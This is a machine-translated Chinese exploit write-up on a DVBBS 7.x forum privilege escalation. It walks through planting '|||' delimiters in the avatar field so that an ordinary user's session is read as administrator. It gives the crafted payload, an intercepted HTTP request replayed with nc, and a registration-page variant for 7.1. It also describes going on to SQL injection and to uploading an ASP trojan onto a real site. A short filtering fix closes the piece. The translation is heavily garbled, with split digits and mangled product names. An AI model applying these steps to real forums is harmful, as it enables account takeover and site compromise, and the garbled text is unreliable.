Action Network 7. x-privilege escalation vulnerability-vulnerability warning-the black bar safety net

2006-01-11T00:00:00
ID MYHACK58:6220066277
Type myhack58
Reporter 佚名
Modified 2006-01-11T00:00:00

Description

In 6 months the Black anti-see on themoving web7.1vulnerabilitydiscovered the Wild World of a text, that is admin_postings. asp file exists injectionvulnerabilities, but the use of the premise is to have super moderators or front Desk administrator permissions. I remembered previously found that themoving web7. x version there is a front elevation of privilegevulnerability, just can be combined to use. This front elevation of privilegevulnerability7. x Access and SQL version are valid. Here we are with the 7. 0 SP2 SQL edition, to explain thisvulnerabilityto use.

Vulnerabilityanalysis: We knowmoving webis by the GroupID to determine the current user's group, and then through the set of information to determine the user's permissions. It is how to get the GroupID? Let's look at the log to verify that the section: login. asp 5 2 5 lines of: Rem==========the forum login function========= Rem determine the user login Function ChkUserLogin(username,password,mobile,userCookies,ctype) ............ The previous code omitted SQL="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace ,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,Lockuser,Userclass,UserGroupID,UserGroup, userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden, UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday" SQL=SQL+" From [Dv_User] Where "&SQLstr&"" set rsUser=DVBBS. Execute(SQL) If rsUser. eof and rsUser. bof Then ChkUserLogin=false Exit Function Else iMyUserInfo=rsUser. GetString(,1, "|||", "", "") rsUser. Close:Set rsUser = Nothing End If iMyUserInfo = "DVBBS|||"& Now & "|||" & Now &"|||"& DVBBS. BoardID &"|||"& iMyUserInfo &"|||||| DVBBS" iMyUserInfo = Split(iMyUserInfo,"|||") If trim(password)<>trim(iMyUserInfo(6)) Then ChkUserLogin=false ElseIf iMyUserInfo(1 7)=1 Then ChkUserLogin=false ElseIf iMyUserInfo(1 9)=5 Then ChkUserLogin=false Else ChkUserLogin=True Session(DVBBS. CacheName & "UserID") = iMyUserInfo DVBBS. UserID = iMyUserInfo(4) RegName = iMyUserInfo(5) Article = iMyUserInfo(8) UserLastLogin = iMyUserInfo(1 of 5) Focus on your chosen = iMyUserInfo(1 of 8) GroupID = iMyUserInfo(1 9) TitlePic = iMyUserInfo(3 of 4) If Article<0 Then Article=0 End If ............ The back of the code omitted You can see thatmoving webto the user of the information first with“|||”three vertical lines connected together, as a string to the iMyUserInfo,then iMyUserInfo by“|||”partition into a string array. User password verify correctly after the array of the 2 0 th element value: iMyUserInfo(1 9)is assigned to the GroupID is. See, the GroupID is just an array corresponding to the first 2 0 the value of the element, if iMyUserInfo(1 9)The value of 1 whilemoving webis thought login now the user is the front Desk administrator. In the inc directory under the Dv_ClsMain. the asp file also has so authenticate the user of a piece of code, used in the user update the information after the detection of the user's permissions. Dv_ClsMain. asp 6 5 0 lines Public Sub TrueCheckUserLogin() ...... In front of the omitted Dim Rs,SQL SQL="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex, UserFace,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,Lockuser,Userclass,UserGroupID, UserGroup,userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest, UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday" SQL=SQL+" From [Dv_User] Where UserID = " & UserID Set Rs = Execute(SQL) If Rs. Eof And Rs. Bof Then Rs. Close:Set Rs = Nothing UserID = 0 EmptyCookies LetGuestSession() Else MyUserInfo=Rs. GetString(,1, "|||","","") Rs. Close:Set Rs = Nothing If IsArray(Session(CacheName & "UserID")) Then MyUserInfo = "DVBBS|||"& Now & "|||" & Session(CacheName & "UserID")(2) &"|||"& BoardID &"|||"& amp; MyUserInfo &"|||||| DVBBS" Else MyUserInfo = "DVBBS|||"& Now & "|||" & DateAdd("s",-3600,Now()) &"|||"& BoardID &"|||"& amp; MyUserInfo &"|||||| DVBBS" End IF Response. Write MyUserInfo MyUserInfo = Split(MyUserInfo,"|||") ...... End If End Sub 'The user after a successful login, use this function to read the user array and to determine some common information Public Sub GetCacheUserInfo() MyUserInfo = Session(CacheName & "UserID") UserID = Clng(MyUserInfo(4)) MemberName = MyUserInfo(5) Lastlogin = MyUserInfo(1 Of 5) If Not IsDate(LastLogin) Then LastLogin = Now() UserGroupID = Cint(MyUserInfo(1 9)) ...... Behind the code is omitted Two tests of way exactly the same, so we can use both in any one to achieve our purpose. See it in the SQL statement section: SQL="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,Lockuser,Userclass,UserGroupID,UserGroup,userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday" SQL=SQL+" From [Dv_User] Where UserID = " & UserID UserGroupID field row in the first 1 6, as long as we in front of a field ofdatacontains a“|||”, then the UserGroupID in the MyUserInfo this array of strings position changed. For this field to select some special requirements, The type of field to the right, not for numeric type, the field length can accommodate the following we construct the array, and also is the above SQL statement in the row in the UserGroupID in front of the field, so as to make the structure of the array changes the original array UserGroupID position. As shown in Figure 1 shown in Fig. We can use only UserEmail, the UserFace of these two fields. Due to the IsValidEmail function exists, we can't in the UserEmail field to insert the‘|’,it is possible to use only UserFace field. At the basic information modification, themoving webto filter only theSQL injectionwith a few symbols, not to filter out the‘|’, so as long as we construct the correct string, you can fool themoving web, to become users in the Administrators group. face=Dv_FilterJS(replace(face,"'","")) face=Replace(face,"..","") face=Replace(face,"\","/") face=Replace(face,"^","") face=Replace(face,"#","") face=Replace(face,"%","")

Vulnerability: How to construct the UserFace to achieve our purpose? The beginning I thought as long as iMyUserInfo(1 9)for 1 you can be an administrator, but has no success. In fact, we construct the UserFace is also to be taken into account, we have changed the iMyUserInfo array structure, we must ensure that the new iMyUserInfo array of the front part of the structure and the original array structure is exactly the same, otherwise there will be type conversion errors, such as UserBirthday, in a new array in the field position value must be a date. We can directly get a normal iMyUserInfo the latter part of the To do our UserFace value, then the UserGroupID position instead of one. I modified the login. asp file, let it when the user logs on displays the current user's iMyUserInfo content, as shown in Figure 2.

For example, admin not necessarily have to be admin, the other user is also OK, as long as the UserGroupID of the words 1 on the line to sign in when iMyUserInfo the value of: DVBBS|||2005-6-1918:0 5:3 4|||2005-6-19 1 8:0 5:3 4|||0|||1|||admin|||469e80d32c0559f8||| eway@aspsky.net///4///1///0///images/userface/image1.gif///32///32///2003-12-30 1 6:3 4:0 0|||2005-6-1918:0 4:0 6|||2 5|||0|||administrator|||1||||||1 2 0|||1 1 5|||2 8|||0||||||210.41.235.200 |||0|||0|||0||||||0||||||level10. gif||||||9pc722664t5w7IM7|||0|0|0 ||||||DVBBS We can take images/userface/image1. gif|||3 2|||3 2|||2003-12-30 1 6:3 4:0 0|||2005-6-19 1 8:0 4:0 6|||2 5|||0|||administrator|||1||||||1 2 0|||1 1 5|||2 8|||0||||||210.41.235.200|||0|||0|||0||||||0||||||level10. gif||||||9pc722664t5w7IM7|||0|0|0 ||||||DVBBS Do our UserFace value, note that this value of the length cannot exceed 2 5 5 characters. Moving weblimits the we submit characters for 1 0 0, we can use the NC to submit. First in the machine test, using ordinary user loginmoving web, now the user level or novice on the road. Well, we go to modify the basic information of the place. Submitted by WSE caught under this package

To intercept the package as follows: POST /bs/mymodify. asp? action=updat&username=4 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword, / Referer: <http://210.41.235.199/bs/mymodify.asp> Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; . NET CLR 1.1.4322) Host: 210.41.235.199 Content-Length: 3 9 6 Connection: Keep-Alive Cache-Control: no-cache Cookie: 2 1 0%2E41%2E235%2E199%2Fbs%2F=userCookies=0&StatUserID=2 1 0 4 8 3 4 7 0 5 9&password=fVIy4l887ZvD956c&userhidden=&username=test&focus on your chosen=%D0%C2%CA%D6%C9%CF%C2%B7&userid=4; upNum=0; ASPSESSIONIDASCDABTA=IEGHDLKCCHDMOBPFPFFHMNAM title=&amp; sex=1&face=Images%2Fuserface%2Fimage1. gif&myface=Images%2Fuserface%2Fimage1. gif&width=3 2&height=3 2&birthday=&userphoto=&GroupName=%CE%DE%C3%C5%CE%DE%C5%C9&Signature=&showRe=0&userCookies=0&setuserinfo=1&setusertrue=0&realname=&personal=&country=&userphone=&address=&province=&selectp=0&city=& select=0&shengxiao=&blood=&belief=&occupation=&marital=&education=&college=&Submit=%B8%FC+%D0%C2 Well, we put the userface of the value to replace into images/userface/image1.gif///32///32///2003-12-30%2016:34:00///2005-6-19%2018:04:06///25///0/// 管理员 ///1//////120///115///28///0//////210.41.235.200///0///0///0//////0//////level10.gif|||||| 9pc722664t5w7IM7|||0|0|0 ||||||DVBBS

Note that the intermediate spaces are replaced with%2 0, re-calculate the Content-Length value, and then use NC to submit at once, we are the user's userface is replaced. We now re-login and see. Ha ha, see? We already are the administrator. Recycling black anti-sixth issue of themoving web7.1vulnerabilitydiscovered the Wild World of thevulnerabilityyou can add a background administrator.

Moving web7.1 the use of the method: Moving web7. 1 version use thisvulnerabilitymethod a little change, the difficulty also than 7. 0 SP2To be large. 7.1 version was added to on the face variable in the’|’symbol filter mymodify. asp file 2 7 0 line nearby: face=Dv_FilterJS(Replace(face,"'","")) face=Replace(face,"..","") face=Replace(face,"\","/") face=Replace(face,"^","") face=Replace(face,"#","") face=Replace(face,"%","") face=Replace(face,"|","") It is a pity thatmoving webthe programmer of hundred dense and a sparse, forget the time of registration can also modify the Avatar, in reg. asp is not on the face variable to do any filtering. Reg. asp file 2 of 8 line 5 in the vicinity. If Request. form("face")<>"" Then face=Request. form("face") End If The same, or the first capture after the NC submit. Registration after logging in is the front Desk administrator. But also to be a problem, that is, Truepassword problem. 7.1 strengthening of Cookie spoofing prevention, so this truepassword change too frequently. In 7. 0SP2 the newpass. asp, the only one to update the current user turepassword instructions: 7.0 SP2 newpass. asp file

DVBBS. NewPassword0() %>

And in 7. 1, newpass. asp also checks the user's Cookies whether update. 7.1 newpass. asp files 3 0 row left and right

'Check the write was successful if success then update thedata If DVBBS. checkStr(Trim(Request. Cookies(DVBBS. Forum_sn)("password")))=TruePassWord Then DVBBS. Execute("UpDate [Dv_user] Set TruePassWord='"&TruePassWord&"' where UserID="&DVBBS. UserID) DVBBS. MemberWord = TruePassWord Dim iUserInfo iUserInfo = Session(DVBBS. CacheName & "UserID") iUserInfo(3 5) = TruePassWord Session(DVBBS. CacheName & "UserID") = iUserInfo End If

In 7. 1, our client of the Cookies in the truepassword is updated to the new truepassword, due to theserviceend truepassword from MyUserInfo come, and the MyUserInfo in truepassword the value will not change, at the time of detection will form a dead loop. Our solution is to use Cookies locking, with Guilin veterans of the browser locking our Cookies before the Cookies in the truepassword the value is set to and the MyUserInfo in truepassword the value of the same. So as not to repeat the request newpass. asp into an infinite loop. Due to the on hand there is no 7. 1 The SQL version of the code, so the above is at 7. 1 The Access version of the test, you can successfully become a front Desk administrator.

PostScript: Vulnerabilityof the prevention methods: modified thedatathe database structure of the project big point, it is recommended in reg. asp and mymodify. asp was added to the corresponding variable of the”|”symbols are filtered, for example:

face=Dv_FilterJS(Replace(face,"'","")) face=Replace(face,"..","") face=Replace(face,"\","/") face=Replace(face,"^","") face=Replace(face,"#","") face=Replace(face,"%","") face=Replace(face,"|","")

Also want to mention that, moving webtoo trust background the administrator, so in the background are not many places toSQL injectionfor prevention, which is shaped like give us aSQL injection. We once detected a website, set up the very BT ' s It. The above is DVBBS Forum. When we made the DVBBS the background administrator permissions only to find the Upload Directory does not have execute permissions, the asp Trojan pass up and as it is returned. And by the execution of the asp permissions in the directory has no write permissions. On the site and no other site can be injected. Later found DVBBS background with injection only after I get a horse pony. Really thousands of miles of dikes,ulcer in the colony. Shiver way, this elevatedvulnerabilityis not too profound skill, but the consequences are very serious. Because of front Desk management of a plurality of pages existsSQL injection, so thisvulnerabilityto DVBBS 7. x SQL version of the harm is very large. Please do not use this method to do destructive behavior, otherwise the consequences conceited.